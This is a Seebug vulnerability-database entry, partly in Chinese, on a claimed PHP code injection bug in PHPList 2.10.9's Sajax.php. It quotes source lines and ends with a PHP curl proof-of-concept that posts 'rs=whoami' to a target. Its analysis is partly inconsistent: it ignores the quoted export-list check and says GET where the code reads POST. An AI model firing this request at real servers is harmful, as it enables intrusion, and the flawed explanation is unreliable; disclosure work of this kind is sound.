PHPList 2.10.9 'Sajax.php' PHP代码注入漏洞

2012-05-30T00:00:00
ID SSV:60168
Type seebug
Reporter Root
Modified 2012-05-30T00:00:00

Description

phplist是一个开源的newsletter管理软件,用PHP开发。

PHPList 'Sajax.php'不正确处理用户提交的数据,远程攻击者可以利用漏洞提交恶意代码,并以WEB权限执行。 0 PHPList 2.10.9 厂商解决方案

phplist

目前没有详细解决方案提供: http://www.phplist.com/

                                        
                                            
                                                # --------------------------------------- #
# This PoC was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
# --------------------------------------- #
# 1) Bug
# 2) PoC
# --------------------------------------- #
# 2) Bug :
# An attacker might execute arbitrary PHP code with this vulnerability.
# User tainted data is embedded into a function that compiles
# PHP code on the run and #executes it thus allowing an attacker to inject
own PHP code that will be
# executed. This vulnerability can lead to full server compromise.
# Look To The File Named (Sajax.php) In Dir (admin/commonlib/lib) On Line
(63)
# 63. $func_name = $_POST["rs"];
#       if (! empty($_POST["rsargs"]))
#         $args = $_POST["rsargs"];
#       else
#         $args = array();
#     }
#
#     if (! in_array($func_name, $sajax_export_list))
#       echo "-:$func_name not callable";
#     else {
#       echo "+:";
# 74.      $result = call_user_func_array($func_name, $args);
#       echo $result;
#     }
#     exit;
#   }
# So We Have Variable Func Name With Post rs :)
# In Above Of Code We Have $_GET['rs']; So This Is An Attacker Wan't It.
# Look To Line (74).
# Call_User_Func_Array($func_name, $args);
# Attacker Can Inject In Get Paramater Or POST PHP Code.
# --------------------------------------- #
# 3) PoC :
# <?php
# $target = $argv[1];
# $ch = curl_init();
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
# curl_setopt($ch, CURLOPT_URL, "http://$target/Sajax.php");
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)");
# curl_setopt($ch, CURLOPT_POST, 1);
# curl_setopt($ch, CURLOPT_POSTFIELDS, "rs=whoami");
# curl_setopt($ch, CURLOPT_TIMEOUT, 3);
# curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
# curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
# curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
# $buf = curl_exec ($ch);
# curl_close($ch);
# unset($ch);
# echo $buf;
# ?>